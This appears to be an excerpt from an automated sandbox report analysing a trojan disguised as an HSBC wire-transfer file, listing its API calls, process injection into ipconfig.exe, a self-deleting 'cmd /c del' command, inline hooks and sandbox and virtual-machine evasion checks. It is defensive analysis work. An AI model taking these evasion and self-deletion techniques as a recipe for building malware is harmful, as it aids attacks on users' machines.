          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696D0 NtCreateKey,6_2_016696D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,16_2_03689A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03689910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,16_2_036899A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03689860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,16_2_03689840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,16_2_03689710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,16_2_03689FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,16_2_03689780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_036896E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,16_2_036896D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689540 NtReadFile,LdrInitializeThunk,16_2_03689540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895D0 NtClose,LdrInitializeThunk,16_2_036895D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689B00 NtSetValueKey,16_2_03689B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A3B0 NtGetContextThread,16_2_0368A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A20 NtResumeThread,16_2_03689A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A00 NtProtectVirtualMemory,16_2_03689A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A10 NtQuerySection,16_2_03689A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A80 NtOpenDirectoryObject,16_2_03689A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689950 NtQueueApcThread,16_2_03689950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899D0 NtCreateProcessEx,16_2_036899D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368B040 NtSuspendThread,16_2_0368B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689820 NtEnumerateKey,16_2_03689820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898F0 NtReadVirtualMemory,16_2_036898F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898A0 NtWriteVirtualMemory,16_2_036898A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689760 NtOpenProcess,16_2_03689760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A770 NtOpenThread,16_2_0368A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689770 NtSetInformationFile,16_2_03689770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689730 NtQueryVirtualMemory,16_2_03689730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A710 NtOpenProcessToken,16_2_0368A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036897A0 NtUnmapViewOfSection,16_2_036897A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689660 NtAllocateVirtualMemory,16_2_03689660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689670 NtQueryInformationProcess,16_2_03689670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689650 NtQueryValueKey,16_2_03689650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689610 NtEnumerateValueKey,16_2_03689610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689560 NtWriteFile,16_2_03689560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689520 NtWaitForSingleObject,16_2_03689520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368AD30 NtSetContextThread,16_2_0368AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895F0 NtQueryInformationFile,16_2_036895F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A360 NtCreateFile,16_2_02C7A360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A490 NtClose,16_2_02C7A490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A410 NtReadFile,16_2_02C7A410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A3B2 NtCreateFile,16_2_02C7A3B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A35A NtCreateFile,16_2_02C7A35A
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: S/ISectionEnt;component/views/addbook.xamli/ISectionEnt;component/views/borrowfrombookview.xaml_/ISectionEnt;component/views/borrowingview.xamlY/ISectionEnt;component/views/changebook.xamla/ISectionEnt;component/views/changecustomer.xaml]/ISectionEnt;component/views/customerview.xamla/ISectionEnt;component/views/deletecustomer.xamlW/ISectionEnt;component/views/errorview.xaml[/ISectionEnt;component/views/smallextras.xaml[/ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: HSBC ... Wire Transfer Copy.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E92F5 push ds; ret 0_2_003E9340
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9361 push ds; retf 0_2_003E9364
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9347 push ds; ret 0_2_003E934C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041EA76 push 1501B1CAh; retf 6_2_0041EA7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00416C20 push C10A24AAh; iretd 6_2_00416C25
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_004164D3 push eax; retf 6_2_004164D6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C092F5 push ds; ret 6_2_00C09340
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09347 push ds; ret 6_2_00C0934C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09361 push ds; retf 6_2_00C09364
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0167D0D1 push ecx; ret 6_2_0167D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0369D0D1 push ecx; ret 16_2_0369D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EA76 push 1501B1CAh; retf 16_2_02C7EA7B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C764D3 push eax; retf 16_2_02C764D6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D4B5 push eax; ret 16_2_02C7D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C76C20 push C10A24AAh; iretd 16_2_02C76C25
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EDAE pushad ; ret 16_2_02C7EDAF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D56C push eax; ret 16_2_02C7D572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D502 push eax; ret 16_2_02C7D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D50B push eax; ret 16_2_02C7D572
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86790735928

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEF
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.2908f34.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.299b518.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HSBC ... Wire Transfer Copy.exe PID: 6892, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69904 second address: 0000000002C6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69B7E second address: 0000000002C69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 985 > 30Jump to behavior
